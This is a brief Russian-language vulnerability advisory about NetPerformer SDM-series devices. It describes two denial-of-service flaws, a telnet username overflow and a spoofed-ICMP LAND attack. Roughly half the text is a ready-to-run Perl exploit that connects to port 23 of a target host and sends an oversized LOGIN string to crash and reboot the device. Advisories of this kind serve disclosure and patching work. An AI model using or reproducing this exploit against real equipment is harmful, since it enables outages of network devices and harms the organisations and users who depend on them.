Программа: NetPerformer SDM-9220, NetPerformer SDM-9230, NetPerformer SDM-9380, NetPerformer SDM-9500

Злоумышленник может вызвать отказ в обслуживании.

1. Чрезмерно длинное имя пользователя, посланное к службе telnet, приведет к аварийному завершению работу и перезагрузки уязвимого устройства.

Эксплоит:

# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto => "TCP"))
{
print "Modhiar’000 ….. killing netperformer … $ARGV[0]
port 23…";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

2. Удаленный пользователь может послать поддельный ICMP пакет, в котором адрес источника совпадает с адресом устройства (LAND нападение), чтобы нарушить работу устройства.



Оставить мнение